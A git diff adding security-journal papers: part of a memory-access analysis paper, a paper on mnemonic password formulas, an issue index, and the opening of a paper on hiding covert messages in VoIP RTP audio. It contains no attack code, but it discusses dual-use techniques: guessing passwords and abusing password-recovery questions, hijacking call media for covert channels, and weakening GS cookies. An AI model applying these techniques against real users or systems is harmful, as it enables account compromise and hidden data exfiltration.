facilitated by the excellent work that has gone into +DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11]. + +It should be noted that if one is strictly interested in monitoring writes to +a memory region, Windows provides a built-in feature known as a write watch. +When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set. +This flag tells the kernel to track writes that occur to the region. These +writes can be queried at a later point in time using GetWriteWatch[6]. + +It is also possible to use guard pages and other forms of page protection, +such as PAGE_NOACCESS, to intercept memory access to a page in user-mode. +Pedram Amini's PyDbg supports the concept of memory breakpoints which are +implemented using guard pages[12]. This type of approach has two limitations +that are worth noting. The first limitation involves an inability to pass +addresses to kernel-mode that have had a memory breakpoint set on them (either +guard page or PAGE_NOACCESS). If this occurs it can lead to unexpected +behavior, such as by causing a system call to fail when referencing the +user-mode address. This would not trigger an exception in user-mode. +Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a +result, an application might crash or otherwise behave improperly. The second +limitation is that there may be consequences in multi-threaded environments +where memory accesses are missed. + +5) Conclusion + +The ability to analyze the memory access behavior of an application at runtime +can provide additional insight into how an application works. This insight +might include learning more about how data propagates, deducing the code-level +isolation of memory references, identifying potential thread safety issues, +and so on. This paper has described three strategies that can be used to +intercept memory accesses within an application at runtime. + +The first approach relies on Dynamic Binary Instruction (DBI) to inject +instrumentation code before instructions that access memory locations. This +instrumentation code is then capable of obtaining information about the +address being referenced when instructions are executed. + +The second approach relies on hardware paging features supported by the x86 +and x64 architecture to intercept memory accesses. This works by restricting +access to a virtual address range to kernel-mode access. When an application +attempts to reference a virtual address that has been marked as such, an +exception is generated that is then passed to the user-mode exception +dispatcher. A custom exception handler can then inspect the exception and +take the steps necessary to allow execution to continue gracefully after +having tracked the memory access. + +The third approach uses the segmentation feature of the x86 architecture to +intercept memory accesses. It does this by loading the DS and ES segment +registers with the null selector. This has the effect of causing instructions +which implicitly use these registers to generate a general protection fault +when referencing memory. This fault results in an access violation exception +being generated that can be handled in much the same way as the hardware +paging approach. + +It is hoped that these strategies might be useful to future research which +could benefit from collecting memory access information. + +References + +[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming. + http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007. + +[2] Bala, Duesterwald, Banerija. Transparent Dynamic Optimization. + http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007. + +[3] Hewlett-Packard, MIT. DynamoRIO. + http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007. + +[4] Horovitz, Oded. Memory Access Detection. + http://cansecwest.com/core03/mad.zip; accessed 5/7/2007. + +[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming. + http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007. + +[6] Microsoft Corporation. GetWriteWatch. + http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007. + +[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation. + http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007. + +[8] PaX Team. PAGEEXEC. + http://pax.grsecurity.net/docs/pageexec.txt; accessed 5/1/2007. + +[9] Sparks, Butler. Shadow Walker: Raising the Bar for Rootkit Detection. + https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; accessed 5/3/2007. + +[10] Stewart, Joe. Ollybone. + http://www.joestewart.org/ollybone/; accessed 5/3/2007. + +[11] Valgrind. Valgrind. + http://valgrind.org/; accessed 4/30/2007. + +[12] Amini, Pedram. PaiMei. + http://pedram.redhive.com/PaiMei/docs/; accessed 5/10/2007. diff --git a/uninformed/7.3.txt b/uninformed/7.3.txt new file mode 100644 index 0000000..47d66a9 --- /dev/null +++ b/uninformed/7.3.txt @@ -0,0 +1,491 @@ +Mnemonic Password Formulas +I)ruid, C²ISSP +druid@caughq.org +http://druid.caughq.org +5/2007 + +Abstract + +The current information technology landscape is cluttered with a large +number of information systems that each have their own individual +authentication schemes. Even with single sign-on and multi-system +authentication methods, systems within disparate management domains +are likely to be utilized by users of various levels of involvement +within the landscape as a whole. Due to this complexity and the +abundance of authentication requirements, many users are required to +manage numerous credentials across various systems. This has given rise to +many different insecurities relating to the selection and management of +passwords. This paper details a subset of issues facing users and managers of +authentication systems involving passwords, discusses current approaches to +mitigating those issues, and finally introduces a new method for password +management and recalls termed Mnemonic Password Formulas. + +1) The Problem + +1.1) Many Authentication Systems + +The current information systems landscape is cluttered with individual +authentication systems. Even though many systems existing in a distinct +management domain utilize single sign-on as well as multi-system +authentication mechanisms, multiple systems within disparate management +domains are likely to be utilized regularly by users. Even users at the most +casual level of involvement in information systems can be expected to +interface with a half a dozen or more individual authentication systems within +a single day. On-line banking systems, corporate intranet web and database +systems, e-mail systems, and social networking web sites are a few of the many +systems that may require their own method of user authentication. + +Due to the abundance of authentication systems, many end users are required to +manage the large numbers of passwords needed to authenticate with these +various systems. This issue has given rise to many common insecurities related +to selection and management of passwords. + +In addition to the prevalence of insecurities in password selection and +management, advances in authentication and cryptography assemblages have +instigated a shift in attack methodologies against authentication systems. +While recent headway in computing power have made shorter passwords such as +six characters or less (regardless of the complexity of their content) +vulnerable to cracking by brute force[4], common attack methodologies are moving +away from cryptanalytic and brute force methods against the password storage +or authentication system in favor of intelligent guessing of passwords such +as. This intelligent guessing might involved optimized dictionary attacks and +user context guesses, attacks against other credentials required by the +authentication system such as key-cards and password token devices, and +attacks against the interaction between the user and the systems themselves. + +Due to all of the aforementioned factors, the user's password is commonly the +weakest link in any given authentication system. + +1.2) Managing Multiple Passwords + +Two of the largest problems with password authentication relate directly to +the user and how the user manages passwords. First, when users are not allowed +to write down their passwords, they generally will choose easy to remember +passwords which are usually much easier to crack than complex passwords. In +addition to choosing weaker passwords, users are more likely to re-use +passwords across multiple authentication systems. + +Users have an inevitably difficult time memorizing assigned random +passwords[4] and passwords of a mandated higher level of complexity chosen +themselves. When allowed, they may write down their passwords in an insecure +location such as a post-it note stuck to their computer monitor or on a note +pad in their desk. Alternatively, they may store passwords securely, such as +a password encrypted file within a PDA. However, a user could just as easily +lose access to the password store. The user may forget the password to the +encrypted file, or the PDA could be lost or stolen. In this situation, the end +result would require some administrative interaction in the form of issuing a +password reset. + +1.3) Poor Password Selection + +When left to their own devices, users generally do not choose complex +passwords[4] and tend to choose easy to crack dictionary words because they +are easy to remember. Occasionally an attempt will be made at complexity by +concatenating two words together or adding a number. In many cases, the word +or words chosen will also be related to, or within the context of, the user +themselves. This context might include things like a pet's name, phone +number, or a birth date. + +These types of passwords require much less effort to crack than a brute-force +trial of the entire range of potential passwords. By using an optimized +dictionary attack method, common words and phrases are tried first which +usually leads to success. Due to the high success rate of this method, most +modern attacks on authentication systems target guessing the password first +before attempting to brute-force the password or launch an in-depth attack on +the authentication system itself. + +1.4) Failing Stupid + +When a user cannot remember their password, likely because they have too many +passwords to remember or the password was forced to be too complex for them to +remember, many authentication systems provide a mechanism that the author has +termed ``failing stupid.'' + +When the user ``fails stupid,'' they are asked a reminder question which is +usually extremely easy for them to answer. If answered correctly, users are +presented with an option to either reset their password, have it e-mailed to +them, or perform some other password recovery method. When this type of +recovery method is available, it effectively reduces the security of the +authentication system from the strength of the password to the strength of a +simple question. The answer to this question might even be obtainable through +public information. + +1.4.1) Case Study: Paris Hilton Screwed by Dog + +A well publicized user context attack[2] was recently executed against the +Hollywood celebrity Paris Hilton in which her cellular phone was compromised. +The account password recovery question that she selected for use with her +cellular provider's web site was "What is your favorite pet's name?" Many fans +can most likely recollect from memory the answer to this question, not to +mention fan web sites, message boards, and tabloids that likely have this +information available to anyone that wishes to gather it. The attacker simply +"failed stupid" and reset Hilton's online account password which then allowed +access to her cellular device and its data. + +2) Existing Approaches + +2.1) Write Down Passwords + +During the AusCERT 2005 information security conference, Jesper Johansson, +Senior Program Manager for Security Policy at Microsoft, suggested[1] reversing +decades of information security best practice of not writing down passwords. +He claimed that the method of password security wherein users are prohibited +from writing down passwords is absolutely wrong. Instead, he advocated +allowing users to write down their passwords. The reasoning behind his claim +is an attempt at solving one of the problems mentioned previously: when users +are not allowed to write down their passwords they tend to choose easy to +remember (and therefore easy to crack) passwords. Johansson believes that +allowing users to write down their passwords will result in more complex +passwords being used. + +While Mr. Johansson correctly identifies some of the problems of password +security, his approach to solving these conundrums is not only short-sighted, +but also noncomprehensive. His solution solves users having to remember +multiple complex passwords, but lso creates the aforementioned insecure +scenarios regarding written passwords which are inherently physically less +secure and prone to require administrative reset due to loss. + +2.2) Mnemonic Passwords + +A mnemonic password is a password that is easily recalled by utilizing a +memory trick such as constructing passwords from the first letters of easily +remembered phrases, poems, or song lyrics. An example includes using the +first letters of each word in a phrase, such as: "Jack and Jill went up the +hill," which results in the password "JaJwuth". For mnemonic passwords to be +useful, the phrase must be easy for the user to remember. + +Previous research has shown[4] that passwords built from phrase recollection like +the example above yield passwords with complexity akin to true random +character distribution. Mnemonic passwords share a weakness with regular +passwords in that users may reuse them across multiple authentication systems. +Such passwords are also commonly created using well known selections of text +from famous literature or music lyrics. Password cracking dictionaries have +been developed that contain many of these common mnemonics. + +2.3) More Secure Mnemonic Passwords + +More Secure Mnemonic Passwords[1] (MSMPs), are passwords that are derived from +simple passwords which the user will remember with ease, however, they use +mnemonic substitutions to give the password a more complex quality. +``Leet-speaking'' a password is a simple example of this technique. For +example, converting the passwords ``beerbash'' and ``catwoman'' into +leet-speak would result in the passwords ``b33rb4sh'' and ``c@w0m4n'', +respectively. + +A unique problem of MSMPs is that not all passwords can be easily transformed +which limits either the choice of available passwords or the password's +seemingly complex quality. MSMPs also rely on permutations of an underlying +dictionary words or sets of words which are easy to remember. Various cracking +dictionaries have been developed to attack specific methods of permutations +such as the "leet-speak" method mentioned above. As with mnemonic passwords, +these passwords might be reused across multiple authentication systems. + +2.4) Pass Phrases + +Pass phrases[3] are essentially what is used as the root of a mnemonic password. +They are easier to remember and much longer which results in a password being +much more resilient to attack by brute force. Pass phrases tend to be much +more complex due to the use of upper and lower case characters, white-space +characters, as well as special characters like punctuation and numbers. + +However, pass phrases have their own sets of problems. Many authentication +systems do not support lengthy authentication tokens, thus resulting in pass +phrases that are not consistently usable. Like the aforementioned methods, +the same pass phrase may be reused across multiple authentication systems. + +3) Mnemonic Password Formulas + +3.1) Definition + +A Mnemonic Password Formula, or MPF, is a memory technique utilizing a +predefined, memorized formula to construct a password on the fly from various +context information that the user has available. + +3.2) Properties + +Given a well designed MPF, the resultant password should have the following +properties: + + - A seemingly random string of characters + - Long and very complex, therefore difficult to crack via brute force + - Easy to reconstruct by a user with knowledge of only the formula, + themselves, and the target authentication system + - Unique for each user, class of access, and authenticating system + +3.3) Formula Design + +3.3.1) Syntax + +For the purposes of this paper, the following formula syntax will be used: + + - : An element, where is meant to be entirely replaced by something known as described by X. + - | : When used within an element's angle brackets (< and >), represents an OR value choice. + - All other characters are literal. + +3.3.2) A Simple MPF + +The following simple formula should be sufficient to demonstrate the MPF +concept. Given the authenticating user and the corresponding authenticating +system, a formula like that shown in the following example could be +constructed. This example formula contains two elements: the user and +the target system identified either by hostname or the most significant octet +of the IP address. + +! + +The above MPF would yield such passwords as: + + - "druid!neo" for user druid at system neo.jpl.nasa.gov + - "intropy!intropy" for user intropy at system intropy.net + - "thegnome!nmrc" for user thegnome at system nmrc.org + - "druid!33" for user druid at system 10.0.0.33 + +This simple MPF schema creates fairly long, easy to remember, passwords that +contain a special character. However, it does not yield very complex +passwords. A diligent attacker may include the target user and hostname as +some of the first combinations of dictionary words used in a brute force +attack against the password. Due to the fact that only the hostname or last +octet of the IP address is used as a component of the schema, passwords may +not be unique per system. If the same user has an account on two different web +servers, both with hostname "www", or two different servers with the same last +address octet value within two different sub-nets, the resultant passwords +will be identical. Finally, the passwords yielded are variable in length and +may not comply with a given systems password length policies. + +3.3.3) A More Complex MPF + +By modifying the simple MPF above, complexity can be improved. Given the +authenticating user and the authenticating system, an MPF with the following +components can be constructed: + +!. + +The more complex MPF contains three elements: represents the first letter +of the username, represents the first letter of the hostname or first +number of the first address octet, and represents the first +letters of the remaining domain name parts or first numbers of the remaining +address octets, concatenated together. This MPF also contains another special +character in addition to the exclamation mark, the period between the second +and third element. + +The above MPF would yield such passwords as: + + - "d!n.jng" for user druid at system neo.jpl.nasa.gov + - "i!i.n" for user intropy at system intropy.net + - "t!n.o" for user thegnome at system nmrc.org + - "d!1.003" for user druid at system 10.0.0.33 + +The modified MPF contains two special characters which yields more complex +passwords, however, the passwords are still variable length and may not comply +with the authenticating system's password length policies. The example MPF is +also increasing in complexity and may not be easily remembered. + +3.3.4) Design Goals + +The ideal MPF should meet as many of the following design goals as possible: + + - Contain enough elements and literals to always yield a minimum password + length + - Contain enough complex elements and literals such as capital letters and + special characters to yield a complex password + - Elements must be unique enough to yield a unique password per + authenticating system + - Must be easily remembered by the user + +3.3.5) Layered Mnemonics + +Due to the fact that MPFs can become fairly complex while attempting to meet +the first three design goals listed above, a second layer of mnemonic +properties can be applied to the MPF. The MPF, by definition, is a mnemonic +technique due to its property of allowing the user to reconstruct the password +for any given system by remembering only the MPF and having contextual +knowledge of themselves and the system. Other mnemonic techniques can be +applied to help remember the MPF itself. This second layer of mnemonics may +also be tailored to the user of the MPF. + +Given the authenticating user and the authenticating system, an adequately +complex, long, and easy to remember MPF like the following could be +constructed: + +@.; + +This MPF contains three elements: represents the first letter of the +username, represents the first letter of the hostname or first number of +the first address octet, and represents the last letter of the domain +name suffix or last number of the last address octet. The modified MPF also +contains a third special character in addition to the exclamation mark and +period: the semicolon after the final element. + +The above MPF would yield such passwords as: + + - "d@n.v;" for user druid at system neo.jpl.nasa.gov + - "i@i.t;" for user intropy at system intropy.net + - "t@n.g;" for user thegnome at system nmrc.org + - "d@1.3;" for user druid at 10.0.0.33 + +Unlike the previously discussed MPFs, the one mentioned above employs a +secondary mnemonic technique by reading in a natural way and is thus easier +for a user to remember. The MPF can be read and remembered as ``user at host +dot domain,'' which is equatable to the structural format of an email address. +Also, a secondary mnemonic technique specific to the user of this MPF was used +by appending the literal semicolon character. This MPF was designed by a C +programmer who would naturally remember to terminate her passwords with +semicolons. + +3.3.6) Advanced Elements + +MPFs can be made even more complex through use of various advanced elements. +Unlike simple elements which are meant to be replaced entirely by some static +value like a username, first letter of a username, or some part of the +hostname, advanced elements such as repeating elements, variable elements, and +rotating or incrementing elements can be used to vastly improve the MPF's +output complexity. Note, however, that overuse of these types of elements may +cause the MPF to not meet design goal number four by making the MPF too +difficult for the user to remember. + + - Repeating Elements + + MPFs may yield longer passwords by repeating simple elements. For + example, an element such as the first letter of the hostname may be + used twice: + + @.; + + Such repeating elements are not required to be sequential, and + therefore may be inserted at any point within the MPF. + + - Variable Elements + + MPFs can yield more complex passwords by including variable elements. For + example, the MPF designer can prepend the characters "p:" or "b:" to the + beginning of the to include an element indicating whether the target system + is a personal or business. + + :@.; + + To further expand this example, consider a user who performs system + administration work for multiple entities. In this case the variable + element being prepended could be the first letter of the system's managing + entity: + + :@.; + + could be replaced by ``p'' for a personal system, ``E'' for a system + within Exxon-Mobil's management domain, or ``A'' for a system managed by + the Austin Hackers Association. Most of the elements used thus far are + relatively simple variable elements that derive their value from other + known contextual information such as user or system name. The contrast is + that elements are capricious only in how their value changes when the MPF + is applied to different systems. Variable elements change values in + relation to the context of the class of access or due to a number of other + factors outside the basic ``user/system'' context. + + + To illustrate this concept, the use of the same MPF for a super-user and an + unprivileged user account on the same system may result in passwords that + only differ slightly. Including a variable element can help to mitigate + this similarity. Prepending the characters ``0:'' or ``1:'' to the + resultant password to indicate super-user versus unprivileged user access. + Respectively, by inclusion of an additional variable element in the MPF + will result in the password's increased complexity as well as indicating + class of access: + + Variable elements are not required to prepend the beginning of the formula + as with the examples above; they can be easily appended or inserted + anywhere within the MPF. + + - Rotating and Incrementing Elements + + Rotating and incrementing elements can be included to assist in managing + password changes required to conform to password rotation policies. A + rotating element is one which rotates through a predefined list of values + such as "apple", "orange", "banana", etc. An incrementing element such as + the one represented below by is derived from an open-ended linear sequence + of values incremented through such as "1", "2", "3" or "one", "two", + "three". When a password rotation policy dictates that a password must be + changed, rotate or increment the appropriate elements: + + @.;<\#> + + The above MPF results in passwords like "d@c.g:1", "d@c.g:2", "d@c.g:3", + etc. To further illustrate this principle, consider the following MPF: + + @.; + + The above MPF, when used with the predefined list of fruit values mentioned + above, yields passwords like "d@c.g:apple", "d@c.g:orange", "d@c.g:banana", + etc. + + The only additional pieces of information that the user must remember other + than the MPF itself is the predefined list of values in the rotating + element, and the current value of the rotating or incrementing element. + + In the case of rotating elements this list of values may potentially be + written down for easy reference without compromising the security of the + password itself. Lists may further be obscured by utilizing certain + values, like a grocery list or a list of company employees and telephone + extensions that may already be posted within the user's environment. In + the case of incrementing elements, knowledge of the current value should be + all that is required to determine the next value. + +3.4) Enterprise Considerations + +Large organizations could use MPFs assigned to specific users to facilitate +dual-access to a user's accounts across the enterprise. If the enterprise's +Security Operations group assigns unique MPFs to it's users, Security Officers +would then be able to access the user's accounts without intrusively modifying +the user's account or password. This type of management could be used for +account access when user is absent or indisposed, shared account access among +multiple staff members or within an operational group, or even surveillance of +a suspected user by the Security Operations group. + +3.5) Weaknesses + +3.5.1) The ``Skeleton Key'' Effect + +The most significant weakness of passwords generated by MPFs is that when the +formula becomes compromised, all passwords to systems for which the user is +using the respective MPF schema are potentially compromised. This situation is +no worse than a user simply using the same password on all systems. In fact, +it is significantly better due to the resultant passwords being individually +unique. When using a password generated by an MPF, the password should be +unique per system and ideally appear to be a random string of characters. In +order to compromise the formula, an attacker would likely have to crack a +significant number of system's passwords which were generated by the formula +before being able to identify the correlation between them. + +3.5.2) Complexity Through Password Policy + +A second weakness of MPF generated passwords is that without rotating or +incrementing elements, they are not very resilient to password expiration or +rotation policies. There exists a trade-off between increased password +security via expiring passwords and MPF complexity. However, the trade-off is +either to have both, or neither. The more secure option is to use both, +however, this practice increases the complexity of the MPF potentially causing +the it to not meet design goal number four. + +6) Conclusion + +MPFs can effectively mitigate many of the existing risks of complex password +selection and management by users. However, their complexity and mnemonic +properties must be managed very carefully in order to achieve a comfortable +level of password security while also maintaining memorability. Users may +reintroduce many of the problems MPFs intend to solve when they become too +complex for users to easily remember. + +References + +[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans + http://www.cs.uno.edu/Resources/FAQ/faq4.html + +[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords + http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html + +[3] McWilliams, Brian. How Paris Got Hacked? + http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html + +[4] Williams, Randall T. The Passphrase FAQ + http://www.iusmentis.com/security/passphrasefaq/ + +[5] Jeff Jianxin Yan and Alan F. Blackwell and Ross J. Anderson and Alasdair Grant. Password Memorability and Security: Empirical Results + http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81 diff --git a/uninformed/7.txt b/uninformed/7.txt new file mode 100644 index 0000000..90e928d --- /dev/null +++ b/uninformed/7.txt @@ -0,0 +1,19 @@ + + +Exploitation Technology +Reducing the Effective Entropy of GS Cookies +skape +This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined. +pdf | code.tgz | html | txt + +General Research +Memalyze: Dynamic Analysis of Memory Access Behavior in Software +skape +This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail. +pdf | code.tgz | html | txt + +Mnemonic Password Formulas +I)ruid +The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas. +pdf | html | txt + diff --git a/uninformed/8.1.txt b/uninformed/8.1.txt new file mode 100644 index 0000000..37f21ae --- /dev/null +++ b/uninformed/8.1.txt @@ -0,0 +1,1723 @@ +Real-time Steganography with RTP +September, 2007 +I)ruid, C²ISSP +druid@caughq.org +http://druid.caughq.org + +Abstract: Real-time Transfer Protocol (RTP) is used by nearly all +Voice-over-IP systems to provide the audio channel for calls. As such, it +provides ample opportunity for the creation of a covert communication channel +due to its very nature. While use of steganographic techniques with various +audio cover-medium has been extensively researched, most applications of such +have been limited to audio cover-medium of a static nature such as WAV or MP3 +file audio data. This paper details a common technique for the use of +steganography with audio data cover-medium, outlines the problem issues that +arise when attempting to use such techniques to establish a full-duplex +communications channel within audio data transmitted via an unreliable +streaming protocol, and documents solutions to these problems. An +implementation of the ideas discussed entitled SteganRTP is included in the +reference materials. + +1) Introduction + +This paper describes a research effort within the disciplines of +steganography, Internet telephony, and data communications. + +1.1) Overview + +This paper is structured in the following order: The first chapter provides +an introduction, describes the motivation for this research, and covers some +basic concepts and terminology for the subjects of Voice over IP (VoIP), +Real-time Transport Protocol (RTP), Steganography, and, more specifically, the +use of steganography with an audio cover-medium. The second chapter defines +the concept of real-time steganography, discusses using steganography with +RTP, and describes some of the identified problems and challenges. The third +chapter details the reference implementation entitled SteganRTP including a +description of the project's goals, the implementation's operational +architecture, process flow, message data structure, and functional +sub-systems. The fourth chapter addresses the identified problems and +challenges that were met and describes how they were solved. The fifth and +final chapter concludes the paper with observations made as a result of this +research effort. + +1.2) Voice over IP + +The term Voice over IP (VoIP) is nearly synonymous with Internet Telephony. +The majority of VoIP systems are designed to utilize separate signaling and +media channels to provide calling services to users. The signaling channel is +generally used to set-up, manage, and tear-down calls between two or more +parties whereas the media channel is used to transmit the audio, video, or +other media that may be associated with the call. A number of competing +protocol standards exist for use as the VoIP system's signaling channel which +include Session Initiation Protocol (SIP)[1], H.323[2], Skinny[3], and many others. +Real-time Transport Protocol (RTP)[4], however, is used almost ubiquitously to +provide VoIP systems with the required media channel. + +1.3) Real-time Transport Protocol + +Real-time Transport Protocol (RTP) is described by the protocol authors as ``a +transport protocol for real-time applications.'' RTP provides an end-to-end +network transport suitable for applications transmitting real-time data such +as audio, video or any other type of streamed data. RTP generally utilizes +the User Datagram Protocol (UDP)[5] for its transport and can do so in both +multicast or unicast network environments. When employed by a VoIP system, +RTP generally handles the media channel of a call. The call's media channel +is generally handled independent of the VoIP signaling channel. However, per +the RTP specification, there are no default network ports defined. As such, +the RTP endpoint network ports must be negotiated between the endpoints via +the signaling channel. Other events in the signaling channel may also +influence the operation of the media channel as handled by RTP such as +requests to change audio encoding, add or remove parties from the call, or +tear down the call. + +One of RTP's current deficiencies is that it is entirely clear-text while +traversing the network. An RTP profile has been defined for encrypting parts +of the RTP data packet called Secure Real-time Transport Protocol (SRTP)[6]. +However, the specification defines no mechanism for negotiating or securely +exchanging keying information to be used for the encryption and decryption +processes. At the time of this writing, a number of keying mechanisms have +been defined but no standard has either been agreed upon by the standards +bodies or determined by the free market. As such, most implementations of RTP +do not currently use the SRTP profile and instead continue to transmit call +media data in the clear. As will be detailed in full in Section 3.2, this +property of the media channel provides ample opportunity for multiple types +of operational scenarios where unknown third-parties to the legitimate +callers may hijack all or part of the call's media traffic for transmission +of covert communications. Making use of this blatantly insecure property +of RTP is the primary motivation for this research effort. + +1.4) Steganography + +The term steganography originates from the Greek root words ``steganos'' and +``graphein'' which literally mean ``covered writing''. As a sub-discipline of +the academic discipline of information hiding, the primary goal of +steganography is to hide the fact that communication is taking place[7, 8, 9] by +concealing a message within a cover-medium in such a way that an observer can +not discern the presence of the hidden message. + +Conversely, steganalysis is the act of attempting to detect a concealed +message which was hidden via the use of steganographic techniques[8], thus +preventing a steganographer from achieving their primary goal. Common +steganalysis techniques include statistical analysis of the properties of +potential stego-medium, statistical analysis of extracted potential message +data for properties of language, and many others such as specific techniques +that target known steganographic embedding methods. + +1.4.1) Terminology + +The following terminology as used in the discipline of steganography and +steganalysis has been set forth over many years of compounding research[7, 8, +9]. As such, the following terminology will be used consistently within this +research paper: + + 1. Cover-medium - Data within which a message is to be hidden. + 2. Stego-medium - Data within which a message has been hidden. + 3. Message - Data that is or will be hidden within a stego-medium or + cover-medium, respectively. + 4. Redundant Bits - Bits of data in a cover-medium that can be modified + without compromising that medium's integrity. + +1.4.2) Digitally Embedding + +Digitally embedding a message into a cover-medium usually involves three basic +steps. First, the redundant bits of the target cover-medium must be +identified. Second, it must be decided which of the identified redundant bits +are to be utilized. Finally, the bits selected for use must be modified to +store the message data. In many cases, a cover-medium's redundant bits are +likely to be the least-significant bit or bits of each of the encoded data's +word values. + +1.5) Steganography With Audio + +Media formats in general, and audio formats specifically, tend to be very +inaccurate data formats simply because they do not need to be accurate; the +human ear is not very adept at differentiating sounds. As an example, an +orchestra performance which is recorded with two separate recording devices +will produce vastly different recordings when viewed digitally, but will +generally sound the same when played back if they were recorded in a similar +manner. Due to this inherent inaccuracy, changes to an audio bit-stream can +be made so slightly that when played back the human ear won't be able to +distinguish the difference between the cover-medium audio and the stego-medium +audio. + +With many audio formats, the least-significant bit from each audio sample can +be used as the medium's redundant bits for the embedding of message data. To +illustrate, assume that an audio file encoded with an 8-bit sample encoding +has the following 8 bytes of data in it, which will be used as cover-data: + +0xb4 0xe5 0x8b 0xac 0xd1 0x97 0x15 0x68 + +In binary this would result in the following bit-stream: + +10110100 11100101 10001011 10101100 11010001 10010111 00010101 01101000 + +In order to hide the message byte value 0xd6, or 11010110 in binary, each +sample word's least-significant bit would be modified to represent all 8 bits +of the message byte: + +10110101 11100101 10001010 10101101 11010000 10010111 00010101 01101000 + +The modifications result in the following 8 bytes of stego-data: + +0xb5 0xe5 0x8a 0xad 0xd0 0x97 0x15 0x68 + +When compared to the original 8 bytes of cover-data, it is noticeable that on +average only half of the bytes of data have actually changed value, however +the resulting stego-data's least-significant bits contain the entire message +byte. It is also noticeable that when utilizing this embedding method with a +cover-medium with these word size properties, the cover-medium must be at +least eight times the size of the message in order to successfully embed the +entire message. + +1.5.1) Previous Research + +Audio Steganography + +Much research has been done in the field of steganography utilizing an audio +cover-medium. Techniques such as using audio to convey messages in both the +human audible and inaudible spectrum as well as various methods for the +digital embedding of information into the audio data itself have all been +explored; so much in fact that many methods are now considered standard. Many +of the most recent implementations cannot be considered to advance the state +of research in the area as they generally only implement the standard methods. + +It is important to note that the significant majority of previous research in +the sub-discipline of audio steganography, however, has focused on static, +unchanging audio data files. Tools such as S-Tools[10], MP3Stego[11], Hide 4 +PGP[12], and many others, are just such implementations, employing standard +embedding methods with WAV, MP3, and VOC audio file cover-mediums, +respectively. Very few practical implementations have been developed that +utilize audio steganography with a cover-medium that is in a flux state or +within streaming or real-time media sessions. + +VoIP Steganography + +A few previous research efforts have been made to employ steganography with +various VoIP technologies. A complete analysis of such efforts identified +prior to embarking upon the research presented in this paper has previously +been provided[13]. In summary, most identified research efforts were utilizing +steganographic techniques but not achieving the primary goal of steganography +or otherwise employing steganographic techniques to accomplish an otherwise +overt goal. + +2) Real-time Steganography + +This paper defines ``real-time'' use of steganography as the utilization of +steganographic techniques to embed message data within an active, or +real-time, media stream. The research and reference implementation presented +herein focuses on VoIP call audio as the active media stream being targeted as +cover-medium. + +Nearly all uses of steganography targeting audio cover-medium in general, or +VoIP cover-medium specifically, that were evaluated prior to performing this +research were found to operate on a target cover-medium as a storage channel +and provided separate ``hide'' and ``retrieve'' modes. In addition, most +cover-medium that were targeted by such implementations were of a static +nature such as WAV or MP3 files or were unidirectional such as streaming +stego-audio to a recipient. + +A few weeks prior to the research contained herein being initially presented[14] +at the DEFCON 15[15] hacker conference on August 3rd through 5th 2007, another use +of steganography in a real-time fashion was made public via a research effort +entitled Vo(2)IP[16]. An analysis of this research effort and its deficiencies has +been included in an updated version of the previously mentioned analysis +paper[13]. + +2.1) Context Terminology + +The disciplines of steganography and data networking share some common +terminology which have different meanings relative to each discipline. This +paper discusses research that lies within the realm of both disciplines, and +as such will use terms that may be confusing when taken out of context. The +following terms are defined here and used consistently without to prevent +confusion when interpreting the content of this paper. + + 1. Packet - Used in the data networking sense; A data packet which is routed + through a network, such as an IP/UDP/RTP packet. + 2. Message - Used in the steganography sense; Data to be hidden or retrieved. + +2.2) RTP Payload Redundant Bits + +RTP packet payloads are essentially encoded multimedia data. RTP payloads may +contain any type of multimedia data. However, this research effort focused +entirely on audio. Specifically, audio encoded with the G.711 Codec[17]. Any +number of audio Codecs can be used to encode the RTP payload, the identifier +of which is included in the RTP packet's header as the payload type (PT) +field. + +The frequency, locations, and number of redundant bits found within 